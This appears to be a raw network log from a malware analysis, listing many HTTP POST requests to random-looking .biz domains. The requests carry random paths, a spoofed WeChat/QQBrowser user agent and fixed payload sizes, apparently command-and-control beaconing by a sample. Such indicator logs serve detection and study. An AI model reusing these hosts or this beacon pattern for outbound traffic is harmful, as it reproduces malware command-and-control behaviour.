Source: global traffic	HTTP traffic detected: POST /luqhjxxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fnl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /uqcynitxoaix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rlj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rwebgnmbtiq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hmsaqgigfaxqle HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gcpevfxhbnb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /tpnpycqre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /idnuv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ifmujtvaxdtknray HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qrcvkhcipj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /lurykvmwmoqvfvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rnsuojk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /shc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vhkhfdko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xnnwo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /iobhvfdyhggtu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /mbh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /sjajebqyfvuqndq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /dujlogesynfu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qautyxiqxdcgavi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vdvikkmvoibst HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /go HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bvawourmbxmjmarr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /uquynocac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /igs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /okedkgjfoq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wfcpepuolxclud HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mwes HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /im HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xhqdokiwwp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /na HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /koph HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rifyadu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /lauq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /owesbtnhccxha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rte HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ceabvuhcchcwyyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /gcfjbafgheaeck HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uextgbni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fvthsigvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jftcpo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /jdfcrnyhggjio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /sarbnswr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nhxpdndgorr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mxlx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bss HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /hckdbdnsiwd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dtupajxvn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fkcgbfiiatbbgsse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lfobofpdm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wstlg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ohrgkx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ovauxeggsejjr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vekxop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gblgywtx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
